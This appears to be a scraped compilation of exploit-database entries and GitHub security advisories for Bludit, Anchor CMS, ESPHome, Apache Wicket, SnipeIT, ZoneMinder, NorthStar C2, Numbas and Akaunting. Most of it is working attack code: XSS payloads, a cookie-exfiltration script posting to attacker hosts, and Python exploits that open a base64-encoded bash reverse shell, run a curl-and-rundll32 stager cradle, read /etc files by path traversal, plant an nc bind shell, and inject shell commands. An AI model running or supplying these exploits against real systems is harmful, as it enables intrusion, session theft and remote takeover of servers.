Bludit version 3.13.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bludit 3.13.0 - Cross Site Scripting (XSS)#Exploit Author: Gökhan ŞENŞÜKÜR# Date: 29/02/2024# Vendor Homepage: https://www.bludit.com# Software Link: https://www.bludit.com/releases/bludit-3-13-0.zip# Version: bludit-3-13-0# Tested on: WindowsTECHNICAL DETAILS & POC========================================### Steps to reproduce1.⁠ ⁠Open page http://localhost:test/admin/;2.⁠ ⁠Enter username as `⁠ admin"><img src=x onerror=alert(1)> ⁠`3.⁠ ⁠U can see pop up### HTTP Request  ###POST /test/admin/ HTTP/1.1Host: localhostContent-Length: 139Cache-Control: max-age=0sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/admin/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BLUDIT-KEY=9951a5o12g66e4c9aill39ul4pConnection: closetokenCSRF=d39d816df2972798da8c5be0b0b944cfc5163938&username=%60%60admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%60%60&password=&save=

Bludit 3.13.0 Cross Site Scripting

Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via /anchor/admin/categories/delete/2.

**Cross-Site Request Forgery in Anchor CMS**

High severity GitHub Reviewed Published Mar 22, 2024 to the GitHub Advisory Database • Updated Mar 22, 2024

GHSA-2whx-ccr7-fxqm: Cross-Site Request Forgery in Anchor CMS

Anchor CMS v0.12.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via /anchor/admin/users/delete/2.

GHSA-4xw8-9fj7-j58j: Cross-Site Request Forgery in Anchor CMS

### Summary
API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete).

### Details
It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform.

### PoC
An example of malicious web page that abuses this vulnerability:


<html>
  <body>
	<form action="http://localhost:6052/edit?configuration=poc.yaml" id="#main" method="POST" enctype="text/plain" onsubmit="setTimeout(function () { window.location.reload(); }, 10)">
  	<input type="hidden" name="&lt;script&gt;&#13;&#10;fetch&#40;&apos;https&#58;&#47;&#47;907zv9yp9u3rjerkiakydpvcr3xulk99&#46;oastify&#46;com&#63;x" value="y&apos;&#44;&#32;&#123;&#13;&#10;method&#58;&#32;&apos;POST&apos;&#44;&#13;&#10;mode&#58;&#32;&apos;no&#45;cors&apos;&#44;&#13;&#10;body&#58;document&#46;cookie&#13;&#10;&#125;&#41;&#59;&#13;&#10;&lt;&#47;script&gt;&#13;&#10;" />
	</form>

	<script>
  	document.forms[0].submit();
	</script>

	<script>
	</script>
  </body>
</html>

In which an attacker creates and weaponizes "poc.yaml" config file containing a cookie exfiltration script and forces the payload triggering visiting the vulnerable page.


Example of such script:
<script>
fetch('https://attacker.domain', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>


### Impact
This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page.

In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.



**Summary**

API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete).

**Details**

It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform.

**PoC**

An example of malicious web page that abuses this vulnerability:

    <script>
    document.forms[0].submit();
    </script>
    
    <script>
    </script>
    

In which an attacker creates and weaponizes "poc.yaml" config file containing a cookie exfiltration script and forces the payload triggering visiting the vulnerable page.

Example of such script:

<script> fetch('https://attacker.domain', { method: 'POST', mode: 'no-cors', body:document.cookie }); </script>

**Impact**

This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page.

In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.

**References**

*   GHSA-5925-88xh-6h99
*   GHSA-9p43-hj5j-96h5

GHSA-5925-88xh-6h99: Authentication bypass via Cross site request forgery

ZoneMinder Snapshots versions prior to 1.37.33 suffer from an unauthenticated remote code execution vulnerability.

    import reimport requestsfrom bs4 import BeautifulSoupimport argparseimport base64# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots# Date: 12 December 2023# Discovered by : @Unblvr1# Exploit Author: Ravindu Wickramasinghe (@rvizx9)# Vendor Homepage: https://zoneminder.com/# Software Link: https://github.com/ZoneMinder/zoneminder# Version: prior to 1.36.33 and 1.37.33# Tested on: Arch Linux, Kali Linux# CVE : CVE-2023-26035# Github Link : https://github.com/rvizx/CVE-2023-26035class ZoneMinderExploit:    def __init__(self, target_uri):        self.target_uri = target_uri        self.csrf_magic = None    def fetch_csrf_token(self):        print("[>] fetching csrt token")        response = requests.get(self.target_uri)        self.csrf_magic = self.get_csrf_magic(response)        if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):            print(f"[>] recieved the token: {self.csrf_magic}")            return True        print("[!] unable to fetch or parse token.")        return False    def get_csrf_magic(self, response):        return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)    def execute_command(self, cmd):        print("[>] sending payload..")        data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}        response = requests.post(f"{self.target_uri}/index.php", data=data)        print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")    def exploit(self, payload):        if self.fetch_csrf_token():            print(f"[>] executing...")            self.execute_command(payload)if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')    parser.add_argument('-ip', '--local-ip', required=True, help='local ip')    parser.add_argument('-p', '--port', required=True, help='port')    args = parser.parse_args()    # generating the payload    ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"      ps2 = base64.b64encode(ps1.encode()).decode()    payload = f"echo {ps2} | base64 -d | /bin/bash"    ZoneMinderExploit(args.target_url).exploit(payload)

ZoneMinder Snapshots Remote Code Execution

An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket.
This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series.
Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected.

Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-27439

**Cross-Site Request Forgery in Apache Wicket**

Moderate severity GitHub Reviewed Published Mar 19, 2024 to the GitHub Advisory Database • Updated Mar 20, 2024

**Package**

maven org.apache.wicket:wicket (Maven)

**Affected versions**

\>= 9.1.0, < 9.17.0

\>= 10.0.0-M1, < 10.0.0

**Patched versions**

9.17.0

10.0.0

**Description**

Published to the GitHub Advisory Database

Mar 19, 2024

Last updated

Mar 20, 2024

GHSA-8vvp-525h-cxf9: Cross-Site Request Forgery in Apache Wicket

SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: SnipeIT 6.2.1 - Stored Cross Site ScriptingDate: 06-Oct-2023Exploit Author: Shahzaib Ali KhanVendor Homepage: https://snipeitapp.comSoftware Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1Version: 6.2.1Tested on: Windows 11 22H2 and Ubuntu 20.04CVE: CVE-2023-5452Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting(XSS) feature that allows attackers to execute JavaScript commands. Thelocation endpoint was vulnerable.Steps to Reproduce:1. Login as a standard user [non-admin] > Asset page > List All2. Click to open any asset > Edit Asset3. Create new location and add the payload:<script>alert(document.cookie)</script>4. Now login to any other non-admin or admin > Asset page > List All5. Open the same asset of which you can change the location and the payloadwill get executed.POC Request:POST /api/v1/locations HTTP/1.1Host: localhostContent-Length: 118Accept: */*X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGVX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostReferer: http://localhost/hardware/196/editAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;assetsListingTable.bs.table.cardView=false; laravel_token=eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNMd2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa001MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;XSRF-TOKEN=eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bHFWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3DConnection: closename=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=Thanks,Shahzaib Ali Khan

SnipeIT 6.2.1 Cross Site Scripting

NorthStar C2 agent version 1.0 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This cross site scripting payload can be leveraged to execute commands on NorthStar C2 agents.

    # Exploit Title: NorthStar C2 agent RCE via stored XSS# Date: 2024-03-11# Exploit Author: @_chebuya# Software Link: https://github.com/EnginDemirbilek/NorthStarC2# Version: v1.0# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-28741# Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page.  This XSS can be leveraged to execute commands on NorthStar C2 agents# Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/from http.server import BaseHTTPRequestHandler, HTTPServerfrom bs4 import BeautifulSoupimport requestsimport base64import threadingimport timeimport osclass Collector(BaseHTTPRequestHandler):    def do_GET(self):        cookie = self.path.split("=")[1]        print("Cookie: " + cookie)        self.send_response(200)        self.end_headers()        self.wfile.write(b"")        background_thread = threading.Thread(target=steal_agents, args=(cookie,))        background_thread.start()        self.server.shutdown()def agent_execute_command(agent_id, csrf_token, headers, command):    data = {        'slave': agent_id,        'command': command,        'sid': agent_id,        'token': csrf_token    }    r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)    while True:        r = requests.get(target_url +  f"/getresponse.php?slave={agent_id}", headers=headers)        if len(r.text) != 0 or command == "die":            break                time.sleep(1)def steal_agents(cookie):    headers = {        "Cookie": f"PHPSESSID={cookie}"    }    r = requests.get(target_url + "/clients.php", headers=headers)    soup = BeautifulSoup(r.text, 'html.parser')    rows = soup.find_all('tr')    agent_ids = []    hostnames = []    for row in rows:        cells = row.find_all('td')        if len(cells) != 9:            continue        status = cells[7].text.strip()        if status != 'Online':            continue        agent_ids.append(cells[1].text.strip())        hostnames.append(cells[5].text.strip())    script_tags = soup.find_all('script')    csrf_token = None    for script_tag in script_tags:        if 'csrfToken' in script_tag.text:            csrf_token = script_tag.text.split('"')[1]            break    if csrf_token:        print("CSRF Token:", csrf_token)    else:        print("CSRF Token not found")        return    for i in range(len(agent_ids)):        agent_id = agent_ids[i]        hostname = hostnames[i]        print(f"Stealing {hostname} ({agent_id})...")        print("Enabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "enablecmd")        print(f"Running sliver cradle: {cradle_command}")        agent_execute_command(agent_id, csrf_token, headers, cradle_command)        print("Disabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "disablecmd")        print("Sending suicide to slave")        agent_execute_command(agent_id, csrf_token, headers, "die")        print("Exploit finished, exiting")    os._exit(0)def xor_encryption(text, key):    encrypted_text = ""        for i in range(len(text)):        encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))        return encrypted_textdef generate_sid(sid):    encrypted_sid = xor_encryption(sid, "northstar")    return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()def exploit(target_url, callback_url):    target_url = target_url.rstrip("/") + "/login.php"    protocol = callback_url.split(":")[0] + "://"    host = callback_url.split("/")[2].split(":")[0]    h1, h2 = host[:len(host)//2], host[len(host)//2:]        if callback_url.count(":") == 2:        port = callback_url.split(":")[2]    else:        if protocol == "https://":            port = "443"        else:            port = "80"    sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]    for sid in sid_payloads:        print(sid)        params = {            'sid': generate_sid(sid)        }        requests.get(target_url, params=params, verify=False)def run(port):    server_address = ('', int(port))    httpd = HTTPServer(server_address, Collector)    print(f'Server running on port {port}')    httpd.serve_forever()cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"callback_host = "192.168.1.6"callback_port = "8080"target_url = "http://192.168.1.4:80"callback_url = f"http://{callback_host}:{callback_port}"print("Sending malicious agent registrations...")exploit(target_url, callback_url)print("Registrations finished, waiting for execution...")run(callback_port)

NorthStar C2 Agent 1.0 Cross Site Scripting / Remote Command Execution

Numbas versions prior to 7.3 suffer from a remote code execution vulnerability.

    # Exploit Title: Numbas < v7.3 - Remote Code Execution# Google Dork: N/A# Date: March 7th, 2024# Exploit Author: Matheus Boschetti# Vendor Homepage: https://www.numbas.org.uk/# Software Link: https://github.com/numbas/Numbas# Version: 7.2 and below# Tested on: Linux# CVE: CVE-2024-27612import sys, requests, re, argparse, subprocess, timefrom bs4 import BeautifulSoups = requests.session()def getCSRF(target):    url = f"http://{target}/"    req = s.get(url)    soup = BeautifulSoup(req.text, 'html.parser')    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']    return csrfmiddlewaretokendef createTheme(target):    # Format request    csrfmiddlewaretoken = getCSRF(target)    theme = 'ExampleTheme'    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'    data = (        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'        '\r\n'        f'{csrfmiddlewaretoken}\r\n'        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="name"\r\n'        '\r\n'        f'{theme}\r\n'        f'--{boundary}--\r\n'    )    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',               'User-Agent': 'Mozilla/5.0',               'Accept': '*/*',               'Connection': 'close'}    # Create theme and return its ID    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)    redir = req.url    split = redir.split('/')    id = split[4]    print(f"\t[i] Theme created with ID {id}")    return iddef login(target, user, passwd):    print("\n[i] Attempting to login...")    csrfmiddlewaretoken = getCSRF(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'username': user,            'password': passwd,            'next': '/'}        # Login    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)    res = login.text    if("Logged in as" not in res):        print("\n\n[!] Login failed!")        sys.exit(-1)    # Check if logged and fetch ID    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)    if usermatch:        user = usermatch.group(1)        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)        if idmatch:            id = idmatch.group(1)            print(f"\t[+] Logged in as \"{user}\" with ID {id}")def checkVuln(url):    print("[i] Checking if target is vulnerable...")    # Attempt to read files    themeID = createTheme(url)    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."    hname = s.get(f"{target}/etc/hostname")    ver = s.get(f"{target}/etc/issue")    hnamesoup = BeautifulSoup(hname.text, 'html.parser')    versoup = BeautifulSoup(ver.text, 'html.parser')    hostname = hnamesoup.find('textarea').get_text().strip()    version = versoup.find('textarea').get_text().strip()    if len(hostname) < 1:        print("\n\n[!] Something went wrong - target might not be vulnerable.")        sys.exit(-1)    print(f"\n[+] Target \"{hostname}\" is vulnerable!")    print(f"\t[i] Running: \"{version}\"")    # Cleanup - delete theme    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")    target = f"http://{url}/themes/{themeID}/delete"    csrfmiddlewaretoken = getCSRF(url)    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}    s.post(target, data=data)def replaceInit(target):    # Overwrite __init__.py with arbitrary code    rport = '8443'    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"    csrfmiddlewaretoken = getCSRF(target)    filename = '../../../../numbas_editor/numbas/__init__.py'    themeID = createTheme(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'source': payload,            'filename': filename}    print("[i] Delivering payload...")    # Retry 5 times in case something goes wrong...    for attempt in range(5):        try:            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)        except Exception as e:            pass        # Establish connection to bind shell    time.sleep(2)    print(f"\t[+] Payload delivered, establishing connection...\n")    if ":" in target:        split = target.split(":")        ip = split[0]    else:        ip = str(target)    subprocess.Popen(["nc", "-n", ip, rport])    while True:        passdef main():    parser = argparse.ArgumentParser()    if len(sys.argv) <= 1:        print("\n[!] No option provided!")        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")        sys.exit(-1)    group = parser.add_mutually_exclusive_group(required=True)    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')    parser.add_argument('--target', help='Target IP:PORT')    parser.add_argument('--user', help='Username to authenticate')    parser.add_argument('--passwd', help='Password to authenticate')    args = parser.parse_args()    action = args.action    target = args.target    user = args.user    passwd = args.passwd    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")        if action == 'check':        login(target, user, passwd)        checkVuln(target)    elif action == 'exploit':        login(target, user, passwd)        replaceInit(target)    else:        sys.exit(-1)if __name__ == "__main__":    main()

Numbas Remote Code Execution

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

    # Exploit Title: Akaunting < 3.1.3 - RCE# Date: 08/02/2024# Exploit Author: u32i@proton.me# Vendor Homepage: https://akaunting.com# Software Link: https://github.com/akaunting/akaunting# Version: <= 3.1.3# Tested on: Ubuntu (22.04)# CVE : CVE-2024-22836#!/usr/bin/python3import sysimport reimport requestsimport argparsedef get_company():  # print("[INF] Retrieving company id...")  res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)  if res.status_code != 302:    print("[ERR] No company id was found!")    sys.exit(3)  cid = res.headers['Location'].split('/')[-1]  if cid == "login":    print("[ERR] Invalid session cookie!")    sys.exit(7)  return ciddef get_tokens(url):  res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)  search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)  if not search_res:    print("[ERR] Couldn't get csrf token")    sys.exit(1)  data = {}  data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')  data['session'] = res.cookies.get('akaunting_session')  return datadef inject_command(cmd):  url = f"{target}/{company_id}/wizard/companies"  tokens = get_tokens(url)  headers.update({"X-Csrf-Token": tokens['csrf_token']})  data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      print("[ERR] Command injection failed!")      sys.exit(4)    print("[INF] Command injected!")def trigger_rce(app, version = "1.0.0"):  print("[INF] Executing the command...")  url = f"{target}/{company_id}/apps/install"  data = {"alias": app, "version": version, "path": f"apps/{app}/download"}  headers.update({"Content-Type":"application/json"})  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      search_res = re.search(r">Exit Code\:.*<", res_data['message'])      if search_res:        print("[ERR] Failed to execute the command")        sys.exit(6)      print("[ERR] Failed to install the app! no command was executed!")      sys.exit(5)    print("[INF] Executed successfully!")def login(email, password):  url = f"{target}/auth/login"  tokens = get_tokens(url)  cookies.update({    'akaunting_session': tokens['session']  })  data = {    "_token": tokens['csrf_token'],    "_method": "POST",    "email": email,    "password": password  }    req = requests.post(url, headers=headers, cookies=cookies, data=data)  res = req.json()  if res['error']:    print("[ERR] Failed to log in!")    sys.exit(8)  print("[INF] Logged in")  cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})    def main():  inject_command(args.command)  trigger_rce(args.alias, args.version)if __name__=='__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-u", "--url", help="target url")  parser.add_argument("--email", help="user login email.")  parser.add_argument("--password", help="user login password.")  parser.add_argument("-i", "--id", type=int, help="company id (optional).")  parser.add_argument("-c", "--command", help="command to execute.")  parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")  parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")  args = parser.parse_args()    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}  cookies = {}  target = args.url  try:    login(args.email, args.password)    company_id = get_company() if not args.id else args.id    main()  except:    sys.exit(0)

Tag

#csrf